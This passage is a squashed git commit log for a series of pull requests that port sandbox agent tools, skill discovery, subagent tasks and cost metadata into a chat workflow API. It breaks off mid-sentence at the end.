700 lines. Tests updated for the new shape. 25 tests in touched files green (8 isAgentContext + 4 getSandbox + 7 bashTool + 4 buildRecoupExecEnv + 2 factory). Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat): extract CHAT_AGENT_STOP_WHEN, shared by /api/chat + /api/chat/workflow Per discussion on PR #583. Restoring the streamText stop condition so the workflow agent gets the model wrap-up turn after a tool call (model → tool → tool-result → model → text response), instead of stopping at streamText's default `stepCountIs(1)` after the first tool call. DRY by sharing one constant between the two chat endpoints: - New: `CHAT_AGENT_STOP_WHEN = stepCountIs(111)` in lib/chat/const.ts. Inherits the value that /api/chat already uses (originally hardcoded in getGeneralAgent.ts:55) — high enough that normal flows never hit the cap but bounds runaway loops for cost / replay safety. - lib/agents/generalAgent/getGeneralAgent.ts: imports the constant instead of constructing stepCountIs(111) inline. - app/lib/workflows/runAgentStep.ts: imports the constant, passes to streamText as `stopWhen`. Single-shot agents (createCompactAgent, createContentPromptAgent, createEmailReplyAgent) intentionally keep their local `stepCountIs(1)` — they're not in the multi-step chat family. Full suite 2980/2980 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep… (#585) * feat(chat-workflow): port 7 leaf sandbox tools — read/write/edit/grep/glob/todo/web_fetch (PR 5) Builds on PR 4 (bash + wire-up) by porting the remaining leaf tools from open-agents/packages/agent/tools/. Each is a direct port adapted to api's Sandbox interface, registered in buildAgentTools, and ready for the agent to invoke through the existing experimental_context plumbing. New tool files (one tool per file, per sweetman SRP): - readFileTool.ts — read with 1-indexed offset/limit, numbered output - writeFileTool.ts — create / overwrite (with mkdir -p) on sandbox.writeFile - editFileTool.ts — exact-string replace, ambiguous-match rejection - grepTool.ts — POSIX ERE search via `grep -rn`, capped at 100/10/200 - globTool.ts — find -printf with mtime sort, GNU/BSD-compatible - todoWriteTool.ts — stateless planning surface; echoes the list back - webFetchTool.ts — curl from inside the sandbox, body truncated at 10KB New helpers (utilities used by multiple tools): - shellEscape.ts — `'` → `'\''` dance - toDisplayPath.ts — absolute → relative-when-inside-workdir display path buildAgentTools registers all 8 leaf tools (bash + 7 new). The composite tools (`task`, `ask_user_question`, `skill`) need subagent context / UI rendering / skill discovery infrastructure not in api today and land in a follow-up PR. Tests: 50 new across the 7 tools + 2 helpers + factory. Full suite 3014/3014; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent-tools): harmonize tool exports as direct values (drop factory wrappers) Per PR 585 review question — most tools were defined as `() => tool({...})` factories while two (todoWriteTool, webFetchTool) were direct values. The split was a vestigial copy from open-agents where the factory pattern only made sense for tools that took options (originally bash's ToolOptions, which sweetman had me remove in PR 4 review). AI SDK's `tool()` helper returns a plain value with no per-call state, so the factory wrappers added nothing. Harmonized to direct-value exports across all 8 tools: - bashTool, readFileTool, writeFileTool, editFileTool, grepTool, globTool: dropped the `() =>` wrapper. - buildAgentTools.ts: dropped the matching `()` calls. - 6 test files: dropped `const tool = xTool();` calls (use `xTool` directly). Full suite 3014/3014 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) (#587) * feat(chat-workflow): port skill discovery + skillTool (PR 6, slim) Ports the `skill` composite tool from open-agents along with the skill discovery layer it depends on. The handler now connects to the sandbox before workflow start, scans `${workingDirectory}/skills/` for project- level skills, and threads the catalog into the workflow via `AgentContext.skills`. The `skill` tool is registered in `buildAgentTools` only when the catalog is non-empty — so models in sandboxes without skills never see the tool. New skills layer (lib/skills/): - skillTypes.ts — SkillMetadata, SkillOptions, skillFrontmatterSchema, frontmatterToOptions (Zod schema + camelCase normalization) - parseSkillFrontmatter.ts — hand-rolled YAML subset parser (key:value, quoted strings, booleans; preserves colons in URLs) - extractSkillBody.ts — strip frontmatter, return body - substituteArguments.ts — $ARGUMENTS replacement - injectSkillDirectory.ts — prepend `Skill directory: <path>` - discoverSkills.ts — scan dirs, parse frontmatter, dedupe by name, drop names that shadow built-in /model /resume /new - getSandboxSkillDirectories.ts — slim: `[${workingDirectory}/skills]` only. Global skills (~/.skills) port later alongside short-lived token minting New tool: lib/agent/tools/skillTool.ts — case-insensitive lookup, respects `disable-model-invocation`, surfaces available-skills list on unknown name. Loads SKILL.md content, applies extractSkillBody → injectSkillDirectory → substituteArguments, returns to the model. Wire-up: - AgentContext gains `skills?: SkillMetadata[]` - buildAgentTools accepts `{ skills }`, registers skill tool when non-empty - runAgentStep passes `agentContext.skills` to buildAgentTools - handleChatWorkflowStream connects sandbox + discoverSkills before start(workflow); empty catalog on discovery failure (best-effort, never blocks the request) Slim scope decisions: - Project skills only (no global ~/.skills/ scan yet) - No short-lived token minting; the recoup-api skill would still load + return content, but its curl examples wouldn't authenticate without ad-hoc credentials. Token minting becomes a separate PR where it can be designed properly (Privy JWT vs server-minted JWT scoped to accountId + sandbox session). Tests: 35 new (4 extractSkillBody + 4 substituteArguments + 2 injectSkillDirectory + 7 parseSkillFrontmatter + 9 discoverSkills + 7 skillTool + 4 buildAgentTools updated). Full suite 3049/3049 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(skills): match open-agents 3-path scan (was scanning the wrong dir) The slim getSandboxSkillDirectories looked at \${workingDirectory}/skills/ — a path that doesn't exist in real recoupable sandboxes. The actual layout (mirrored from open-agents/apps/web/lib/skills/directories.ts): - \${workingDirectory}/.claude/skills/ (project, claude-style) - \${workingDirectory}/.agents/skills/ (project, agents-style) - \${HOME}/.agents/skills/ (global; populated at provisioning by installSessionGlobalSkills) Also drops the earlier deferral comment: global skills load fine WITHOUT short-lived token minting. The skill tool returns SKILL.md content to the model; only the curl examples *inside* SKILL.md need auth credentials, and those can be supplied ad-hoc until proper token minting lands. Changes: - getSandboxSkillDirectories now async (uses resolveSandboxHomeDirectory to find the sandbox's actual $HOME — defaults to /root) - exports the two sub-functions (getProjectSkillDirectories + getGlobalSkillsDirectory) so they're individually testable - Handler awaits the async path resolution - New test suite covers all 3 paths + $HOME variants Caught by sweetman pointing out that this same repo (org-rostrum-pacific) DOES show skills in open-agents — proving the slim deferral was wrong. Full suite 3053/3053; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): YAGNI project-dir scan + extract getSkills (per PR 587 feedback) Two changes per user direction: 1. **YAGNI: drop project-skill directory scanning.** All skills are provisioned globally via `installSessionGlobalSkills` at sandbox startup — org repos do NOT bundle their own skill directories. getSandboxSkillDirectories now returns just the single global path: \`\${HOME}/.agents/skills\`. Deleted getProjectSkillDirectories and the PROJECT_SKILL_BASE_FOLDERS array. 2. **SRP: extract getSkills into its own file.** Previously inline in skillTool.ts (per sweetman comment on PR 587). Now lives at lib/skills/getSkills.ts with its own tests. Future skill-aware consumers (e.g. system-prompt builders) share the same accessor instead of duplicating the context-cast. Verified live on preview against \`recoupable/org-rostrum-pacific-...\` BEFORE this commit: - Sandbox provisioning installs 2 globals at /home/vercel-sandbox/.agents/skills/ (recoup-api + artist-workspace) - Agent invoked \`skill({ skill: "recoup-api" })\` successfully, received 11,173 chars of SKILL.md content with the correct "Skill directory: /home/vercel-sandbox/.agents/skills/recoup-api" header Full suite 3055/3055; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(skills): SRP — extract findSkillFile + getGlobalSkillsDirectory Per sweetman PR review (comments r3283710486 and r3283762023). Each helper now lives in its own file with its own focused test suite: - lib/skills/findSkillFile.ts — was inlined in discoverSkills.ts - 3 new unit tests (prefer SKILL.md, fall back to skill.md, null when neither exists) - lib/skills/getGlobalSkillsDirectory.ts — was inlined in getSandboxSkillDirectories.ts - 2 new unit tests (standard path, trailing-slash tolerance) discoverSkills now imports findSkillFile. getSandboxSkillDirectories imports getGlobalSkillsDirectory. The old getSandboxSkillDirectories test loses its inline getGlobalSkillsDirectory cases (those moved to the dedicated test file). Full suite passes; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) (#589) * feat(chat-workflow): port task + ask_user_question composite tools (PR 7) Completes the open-agents tool surface. The agent now has all 11 tools. **ask_user_question** (lib/agent/tools/askUserQuestionTool.ts) — client-side tool with NO server execute. Schema mirrors open-agents verbatim (questions array, options with label/description, multiSelect flag, max 12-char header). streamText halts after emitting the tool- call because there's no result to feed back; the chat UI renders the question component, collects answers, and submits them in the next workflow request's messages array. No WDK pause/resume hook needed. **task** (lib/agent/tools/taskTool.ts) — slim port of open-agents' multi-type SUBAGENT_REGISTRY → one generic subagent. Runs a sub- `streamText` loop with a curated subagent tool set (`read, write, edit, grep, glob, bash`) matching open-agents' `executor` subagent. The subagent tool set deliberately EXCLUDES: - task (recursion guard — open-agents' three subagent types executor/explorer/design all explicitly omit task too; subagents are leaves of the agent tree) - ask_user_question, skill, todo_write, web_fetch (parity with open-agents subagent curation; subagents run autonomously, don't plan from scratch, don't make web calls, don't load further skills) AgentContext gains `modelId?: string` so the subagent can use the same model as its parent. Handler populates it from chat.model_id or the platform default. buildAgentTools registers both new tools unconditionally (skill stays conditional on a non-empty catalog). Quirk: api's AI SDK (6.0.0-beta.122) calls toModelOutput(output) directly, NOT toModelOutput({ output }) as open-agents' newer 6.0.165 does. askUserQuestionTool uses the direct signature. Tests: 9 askUserQuestionTool + 6 taskTool + updated buildAgentTools + AgentContext updates. Full suite 3075/3075 pass, lint clean, production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(task-tool): provide non-empty subagent prompt The subagent's streamText was invoked with messages: [] and only a system prompt, so the AI SDK recorded zero steps and threw NoOutputGeneratedError — surfaced to the parent as "Subagent failed: No output generated. Check the stream for errors." Pass an explicit user-side trigger prompt, mirroring open-agents' task tool. Adds a regression test that asserts streamText receives either a non-empty prompt or non-empty messages. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(task-tool): extract buildSubagentTools (SRP) + drop modelId from AgentContext (KISS) Address PR review feedback: - SRP: move buildSubagentTools to lib/agent/tools/buildSubagentTools.ts (one exported function per file). - KISS: open-agents' AgentContext type does not have modelId — it uses model: LanguageModel / subagentModel?: LanguageModel. api can't follow that exact shape because agentContext is part of a durable Vercel Workflow input and LanguageModel objects aren't JSON-serializable. Instead of inventing modelId on AgentContext, hardcode a default subagent model id in taskTool. A subagentModelId override field can be added if/when a real consumer needs it. Also format-fixes askUserQuestionTool.ts toModelOutput arrow (parentheses around single param flagged by prettier in CI). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(agent): align AgentContext + model resolution with open-agents Match open-agents' `tools/utils.ts` + `types.ts` shape so the subagent inherits the parent's model (rather than the previous hardcoded SUBAGENT_MODEL_ID): - AgentContext gains `model: LanguageModel` (required) and `subagentModel?: LanguageModel`, mirroring open-agents. - Introduce DurableAgentContext = Omit<AgentContext, "model" | "subagentModel"> for the workflow input shape, since LanguageModel instances aren't JSON-serializable and can't ride durable Vercel Workflow inputs. - runAgentStep constructs `callModel = gateway(input.modelId)` once per step and merges it into experimental_context — same pattern as open-agents' prepareCall in open-harness-agent.ts. - New getMainModel / getSubagentModel helpers (SRP, one per file) mirror open-agents' utility functions: getSubagentModel returns `ctx.subagentModel ?? ctx.model`. - taskTool drops the hardcoded SUBAGENT_MODEL_ID; calls getSubagentModel(experimental_context, "task") instead — subagent now defaults to the same model the parent is running. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): emit per-message cost/usage metadata (cutover Bundle C) (#592) * feat(chat-workflow): emit per-message cost/usage metadata (Bundle C) First step in the open-agents → api cutover sequence. Adds a messageMetadata callback to runAgentStep's toUIMessageStream call so the UI receives {modelId, lastStepUsage, totalMessageUsage, lastStepCost, totalMessageCost, stepFinishReasons} on every assistant turn — matching open-agents' WebAgentMessageMetadata shape byte-for-byte so sandbox.recoupable.com's model/cost badges keep working when cut over to /api/chat/workflow. New (SRP, one function per file): - lib/agent/messageMetadata/extractGatewayCost.ts — port of open-agents' gateway-metadata.ts, parses gateway-reported per-step cost from providerMetadata. - lib/agent/messageMetadata/addLanguageModelUsage.ts — port of open-agents' usage.ts, pointwise-sums LanguageModelUsage records. - lib/agent/messageMetadata/AgentMessageMetadata.ts — type mirroring open-agents' WebAgentMessageMetadata. - lib/agent/messageMetadata/buildMessageMetadataCallback.ts — stateful factory returning a fresh callback per turn; accumulates usage + cost across finish-step parts. Wired into app/lib/workflows/runAgentStep.ts. PROGRESS notes called this out as a known gap from the original workflow port (PR 4). Tests: 19 new (6 + 4 + 6 + 3); full suite 3096/3096 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(message-metadata): SRP extractions + upgrade ai SDK; drop normalizeUsage Address PR review feedback (one exported function per file) and adopt the user's preferred path of upgrading api's `ai` package rather than maintaining a normalization shim: - Extract addTokenCounts.ts (used by addLanguageModelUsage) - Extract hasGatewayShape.ts + GatewayProviderMetadata.ts (used by extractGatewayCost) - Split AgentStepFinishMetadata into its own file (was co-located in AgentMessageMetadata) Upgrade the AI SDK so the wire format matches open-agents natively: - ai: 6.0.0-beta.122 → ^6.0.190 - @ai-sdk/anthropic, @ai-sdk/gateway, @ai-sdk/google, @ai-sdk/openai, @ai-sdk/mcp: all bumped to latest stable The new SDK's LanguageModelUsage is the flat shape (top-level `inputTokens` number + nested `inputTokenDetails`) — identical to open-agents' wire format. No conversion needed, so: - Delete normalizeUsage.ts + test (net -82 LOC) - Delete AgentLanguageModelUsage type (use SDK's LanguageModelUsage directly) Production code changes for the SDK upgrade: - runAgentStep + setupChatRequest: await convertToModelMessages (now returns Promise<ModelMessage[]>) Tests: 3106/3106 pass; production typecheck clean; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(task-tool): live subagent progress + transcript (Cutover Bundle B) (#594) Convert taskTool.execute from `async () =>` to `async function*`, mirroring open-agents' `packages/agent/tools/task.ts`. Yields multiple chunks during the subagent run so the chat UI can render: - An initial "Subagent · 0 tools · 0 tokens" card with stable startedAt timestamp - A live `pending: {name, input}` indicator for each tool-call - Accumulated `usage` after each finish-step - A final `{final: ModelMessage[], ...}` chunk containing the full subagent transcript for expandable rendering `toModelOutput` mirrors open-agents' implementation: extracts the last assistant text part from `output.final` for inclusion in the parent agent's context. New (SRP, one function per file): - lib/agent/messageMetadata/sumLanguageModelUsage.ts — wraps addLanguageModelUsage to handle undefined inputs without introducing zero-tokens placeholders. Drive-by fix: askUserQuestionTool's `toModelOutput` signature was `(output) =>` from the older beta SDK era. The current SDK (ai@^6.0.190) passes `({ toolCallId, input, output })`. Updated to `({ output }) =>` so the function actually receives the user's answers at runtime — was previously falling through to the generic "User responded to questions." path. Tests updated to match. Tests: 25 new/updated (12 taskTool + 4 sumLanguageModelUsage + 9 askUserQuestion); full suite 3114/3114 pass; lint clean. Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): thread real cwd + currentBranch into system prompt (cutover Bundle A.7) (#597) * feat(chat-workflow): thread real cwd + currentBranch into system prompt (Bundle A.7) Third open-agents → api cutover bundle. The handler hardcoded `workingDirectory: DEFAULT_WORKING_DIRECTORY` and never set `currentBranch`, so the agent had no environment info in its system prompt and had to run `pwd` / `git branch` on every turn. Production verification (today, before this fix): agent: "My system prompt does not contain working directory or branch information." After this fix the agent receives an Environment section + Current branch line + cloud-sandbox checkpointing block — same shape as open-agents (sandbox.recoupable.com) emits. Changes: - New `lib/chat/buildAgentSystemPrompt.ts` (SRP) — assembles environment section → Current branch → cloud-sandbox checkpointing → custom instructions, all conditional on inputs. Mirrors open-agents' `buildSystemPrompt` (packages/agent/system-prompt.ts). - New `lib/chat/cloudSandboxInstructions.ts` (SRP) — ports open-agents' `CLOUD_SANDBOX_INSTRUCTIONS` block with `{branch}` placeholder substitution. - `handleChatWorkflowStream`: connect the sandbox once for both skill discovery AND cwd/branch reading, then thread real values into `AgentContext.sandbox.workingDirectory` + `.currentBranch`. On connect failure, fall back to DEFAULT_WORKING_DIRECTORY (preserves today's behavior; tools surface real errors later when they reconnect). - `runAgentStep`: build the system prompt via `buildAgentSystemPrompt({cwd, currentBranch, customInstructions})` instead of using the static `agentCustomInstructions` directly. Scope reduced from the original "A.7+9" bundle: dropped contextLimit plumbing because it's a client-side display concern in open-agents, not server-side model routing (verified via grep — open-agents' server never reads context.contextLimit either). Tests: 7 new (6 buildAgentSystemPrompt + 1 runAgentStep wiring); full suite 3121/3121 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore(chat-workflow): drop currentBranch handling from system prompt Per direction: branch is always `main` (the default branch) in api's deployment topology, so the per-branch `Current branch: <name>` line and cloud-sandbox checkpointing block don't add information today. Strip the templating to keep the system prompt focused on what's load-bearing (the Environment section indicating workspace-relative paths). - Delete `lib/chat/cloudSandboxInstructions.ts` (was a port of open-agents' CLOUD_SANDBOX_INSTRUCTIONS, only useful with a real per-session branch) - Drop `currentBranch` from `buildAgentSystemPrompt` options + rendering - Stop reading `sandbox.currentBranch` in handleChatWorkflowStream (the field stays on AgentContext.sandbox for type completeness; also consumed by createSandboxHandler unchanged) - Remove branch-related test cases Can be re-added later if/when meaningful per-session branches (e.g. xx/abcdef12 generated branches) land. Tests: 3119/3119 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): drop stale currentBranch arg from buildAgentSystemPrompt call Build failure on bf1e245 — runAgentStep was still passing `currentBranch: input.agentContext.sandbox.currentBranch` after buildAgentSystemPrompt's option was removed. Stripping it. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com>

* feat(chat-workflow): POST /api/chat/workflow route stub (PR 2 of 5) (#579) * feat(chat-workflow): add POST /api/chat/workflow route stub Adds the route stub for the new sandbox-driven, Vercel-Workflow-backed chat endpoint documented in recoupable/docs#221. The stub validates the full request contract (auth, body, session/chat ownership, sandbox active) and returns a hardcoded UIMessage stream with an x-workflow-run-id: stub-<uuid> header — so the chat-side team can integrate against the real response shape today while the workflow itself is being ported from open-agents in follow-up PRs. Files: - app/api/chat/workflow/route.ts — thin POST shim + OPTIONS for CORS - lib/chat/handleChatWorkflowStream.ts — auth → validate → session/chat ownership → sandbox check → stub UIMessage stream - lib/chat/validateChatWorkflowBody.ts — Zod schema matching the OpenAPI ChatWorkflowRequest (messages, chatId, sessionId, optional context.contextLimit) Status codes implemented (match contract docs): - 200 — UIMessage stream + x-workflow-run-id header - 400 — invalid JSON / invalid body / "Sandbox not initialized" - 401 — validateAuthContext passthrough - 403 — session not owned by API key's account - 404 — session or chat not found (incl. chat under different session) - 500 — selectSessions returned null (DB error) 409 (duplicate workflow run for chat) is deferred to the wire-up PR that adds compareAndSetChatActiveStreamId — no workflow to dedupe yet. Tests (TDD red→green): 23 new tests, all green; full suite 2901 pass. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — SRP/DRY cleanup Two review fixes per PR feedback: 1. SRP/DRY — drop the local errorResponse helper from handleChatWorkflowStream.ts; use the shared lib/networking/errorResponse and lib/zod/validationErrorResponse helpers instead. 2. SRP — move auth + body parsing out of handleChatWorkflowStream.ts into the validator. Rename validateChatWorkflowBody → validateChatWorkflow so it accepts a full NextRequest (like the existing validateChatRequest) and returns an auth-augmented body (accountId/orgId/authToken). The handler now opens with a single `validateChatWorkflow(request)` call. Tests reshaped to match new seams: - Validator test mocks validateAuthContext only - Handler test mocks validateChatWorkflow (the new seam) - Old "400 invalid JSON" + "400 missing chatId" handler tests collapsed into a single "validator short-circuit passes through" test — both are now the validator's responsibility, not the handler's 22/22 new tests green; full suite 2900/2900 pass; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * chore: revert unrelated local changes accidentally swept into PR Previous commit (9262f65) used `git add -A` which picked up local Supabase CLI artifacts (supabase/.temp/) and a local .gitignore tweak that aren't part of this PR's scope. Removing them now so the PR diff stays scoped to the chat-workflow refactor. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow (PR 3 of 4) (#581) * feat(chat-workflow): wire POST /api/chat/workflow to durable Vercel Workflow Replaces the stub UIMessage stream in PR #579 with a real Vercel Workflow agent loop. Stub run-ids (`stub-<uuid>`) are replaced with real ones (`wrun_<id>`) emitted by the workflow runtime. Tools are still NOT wired — the workflow runs streamText with the gateway model + Recoup custom instructions only. Sandbox tool surface comes in a follow-up PR. What's now plumbed end-to-end: - validateChatWorkflow → session+chat ownership → sandbox active → reconcile existing active_stream_id (resume / 409 / fall-through) → refresh lifecycle activity → fire-and-forget persist user message → start runAgentWorkflow → CAS active_stream_id (cancel + 409 on race) → return run.getReadable() with x-workflow-run-id header New helpers (Supabase): - compareAndSetChatActiveStreamId — atomic CAS on chats.active_stream_id - touchChat — bump chats.updated_at - updateChat — generic partial update mirroring updateSession's shape - createChatMessageIfNotExists — INSERT ... ON CONFLICT DO NOTHING via upsert - isFirstChatMessage — true iff exactly one row exists matching messageId New helpers (chat/recoupable): - extractOrgId — `org-<slug>-<uuid>` → uuid (lowercased) - agentCustomInstructions — assistantFileLinkPrompt + recoupApiSkillPrompt - persistLatestUserMessage — fire-and-forget user msg + title-from-first-80 - reconcileExistingActiveStream — 3-attempt resume/clear/conflict loop New workflow files: - app/workflows/runAgentWorkflow.ts — `"use workflow"`, agent loop wrapper - app/workflows/runAgentStep.ts — `"use step"`, single streamText turn Tests: 46 new (8 extractOrgId + 5 cAS + 3 touchChat + 2 updateChat + 3 createChatMessageIfNotExists + 5 isFirstChatMessage + 7 persistLatest + 6 reconcileExistingActiveStream + 18 handler-wire-up tests refactored). Full suite: 2946/2946 pass, lint clean. Out of scope (next PR): sandbox tool ports (10 files + buildAgentTools). Without tools, `finishReason` is always "stop" after one turn — the runAgentWorkflow loop shape is in place but only iterates once today. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR review — structural + P1/P2 fixes Sweetman structural feedback (KISS / OCP): - Move workflow files: app/workflows/runAgent{Workflow,Step}.ts → app/lib/workflows/runAgent{Workflow,Step}.ts - Generic Supabase helpers + domain wrappers: - Generic `updateChat({filter, updates})` with optional CAS predicate on active_stream_id. Subsumes compareAndSetChatActiveStreamId and touchChat (both deleted). - Generic `selectChatMessages({chatId, orderBy, limit, ...})` replaces domain-specific isFirstChatMessage. The "is earliest?" check now lives in persistLatestUserMessage where it belongs. - Rename createChatMessageIfNotExists → `upsertChatMessage` with a discriminated `{ok, row, isDuplicate} | {ok:false, error}` result so callers can tell duplicates from DB errors. - Extract resume-stream block from handler into `maybeResumeChatStream.ts` (OCP — handler stays small, resume logic grows independently). cubic P1 fixes: - CAS-before-start: handler now claims `active_stream_id` with a `pending-<uuid>` placeholder BEFORE calling start(workflow). Closes the race where two requests could both bill the model before one lost the CAS. After start(), promotes the placeholder to the real run id. - updateChat returns discriminated `{ok, rowsUpdated} | {ok:false, error}` so callers distinguish "race lost" (rowsUpdated:0) from DB errors. - reconcileExistingActiveStream: bare try/catch on getRun no longer clears stale active_stream_id on transient workflow API failures — we treat any uncertainty as conflict. Failed CAS-clear on a completed run also returns conflict (rather than possibly falling through to ready on a DB read error). - await getRun(runId).cancel() in handler — previously synchronous + unawaited cancellation could escape the try/catch. cubic P2 fixes: - updateChat updates parameter narrowed to `ChatMutableFields` (excludes id, session_id, created_at). - persistLatestUserMessage: title truncation now respects TITLE_MAX_LENGTH exactly. Uses "…" (1 char) instead of "..." (3 chars) and slices to body-budget = max - suffix. - runAgentStep: acquire writer once, release in finally. Per-chunk writer acquisition could leak the lock on write failure. - runAgentWorkflow: capped at a single turn until messages threading lands with tool ports (PR 4). Multi-turn loop with the same input was unsafe — log+warn if model returns tool-calls and exit. Tests reworked: 231 in the touched files all green; full suite 2949/2949; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): top-level import in reconcileExistingActiveStream The dynamic `await import("workflow/api")` inside the function body was a carry-over from open-agents — handleChatWorkflowStream.ts already top-level imports `start` and `getRun` from the same package, so there's no reason for the lib to defer. Moving to a normal top-level import for consistency. Also tightens the cancel-throws handler test to use the same deferred- rejection pattern as reconcileExistingActiveStream.test.ts so Vitest's unhandled-rejection watcher doesn't trip on the mock setup. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): move active_stream_id CAS out of supabase lib Per sweetman's review on updateChat.ts:64 — the active_stream_id-specific predicate logic doesn't belong in the Supabase plumbing. Restructured: - `lib/supabase/chats/updateChat.ts` now generic. The filter accepts `where: Partial<Tables<"chats">>` (a generic predicate that maps to `column = value` or `column IS NULL`) so no column name is hardcoded in the Supabase lib. - `lib/chat/compareAndSetChatActiveStreamId.ts` — new domain wrapper. Owns the "compare-and-set on active_stream_id" concept and returns a discriminated `{ok, claimed} | {ok: false, error}` result. Handler and reconcileExistingActiveStream both compose against this wrapper instead of constructing predicates inline. - Handler + reconcile updated to use the wrapper. Tests follow. 37/37 tests in touched files pass; full suite 2955/2955; lint clean. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * fix(chat-workflow): Next.js build — discriminated-union narrowing + supabase type depth Two production-build issues surfaced by Vercel that local pnpm test + tsc didn't catch (vitest uses esbuild transpile, no type check; tsc's errors were all in __tests__ unrelated to this PR). 1. `compareAndSetChatActiveStreamId.ts` — `if (result.ok) { ... }` narrowing wasn't kicking in under Next.js's strict TS plugin. Switched to `if ("error" in result)` (in-operator narrowing) which reliably discriminates the union members regardless of literal-type inference quirks. 2. `lib/supabase/chats/updateChat.ts` — `let query = supabase.from(...) .update(...).eq(...)` + reassignment in a `for` loop (`.is()` / `.eq()` per where entry) caused "type instantiation is excessively deep" — Supabase's PostgrestFilterBuilder is heavily generic and the reassignment kept expanding the type. Rewrote as: split where map into equality matches (one `.match(obj)` call) + nullable columns (reduced with `.is(col, null)` typed back to the original builder). Both bugs were behavior-neutral — the function shape and contract are unchanged. 37/37 tests in touched files green; full suite 2955/2955; lint clean; `pnpm build` now succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> --------- Co-authored-by: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4, slim) (#583) * feat(chat-workflow): port bash sandbox tool + wire experimental_context (PR 4 of 4, slim) Slim PR 4: ports the `bash` sandbox tool from open-agents and wires it through the workflow via streamText's `experimental_context`. Proves the entire tool-execution machinery works end-to-end. The remaining 10 tools (read, write, grep, glob, todo, task, ask_user_question, skill, fetch + utils) port in a follow-up; this PR's scope was deliberately held to one tool so the wire-up is reviewable in isolation. New files: - lib/agent/tools/utils.ts — AgentContext type, isAgentContext guard, getSandbox() that reconnects via connectVercel(state) per call. - lib/agent/tools/buildRecoupExecEnv.ts — { RECOUP_ACCESS_TOKEN, RECOUP_ORG_ID } env builder from context. - lib/agent/tools/bashTool.ts — direct port of open-agents bash.ts adapted to api's Sandbox interface. Injects recoup env on foreground execs only (detached processes outlive the prompt → no token). - lib/agent/buildAgentTools.ts — factory returning the agent's tool record. Adding the remaining tools is a one-line append to this map. Wire-up: - runAgentStep now accepts `agentContext`, passes into streamText as experimental_context, and uses streamText's internal multi-step loop (stopWhen: stepCountIs(25)) for tool-call iteration — no outer loop in runAgentWorkflow needed. - handleChatWorkflowStream derives recoupOrgId from session.clone_url via extractOrgId, builds AgentContext with session.sandbox_state + validated.authToken, passes to start(workflow). Tests: 23 new (3 utils + 5 buildRecoupExecEnv + 10 bashTool + 2 factory + 3 workflow file updates picked up by existing tests). Full suite 2978/2978 pass; lint clean; production build succeeds. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com> * refactor(chat-workflow): address PR 583 review — KISS/SRP + drop token exposure Sweetman KISS/SRP feedback (4 comments): - Removed `MAX_TOOL_STEPS` + `stopWhen` from runAgentStep. streamText's default stop condition handles tool-call iteration without an arbitrary cap that could silently truncate the only workflow turn. - Removed `commandNeedsApproval` + `DANGEROUS_COMMAND_PATTERNS` from bashTool. All model-issued commands are trusted in this PR — host- side gating belongs at the route/UI layer if it ever returns. - Removed `needsApproval` from bashTool entirely (subsumes cubic P1 about the broken override ordering — the gate itself is gone). - Split `lib/agent/tools/utils.ts` into per-function files: - `AgentContext.ts` — type - `isAgentContext.ts` — guard - `getSandbox.ts` — sandbox reconnection No catch-all utils file. Cubic feedback: - **P0**: Removed `recoupAccessToken` from AgentContext + handler + buildRecoupExecEnv. Handing the long-lived api key to bash would let any model-issued 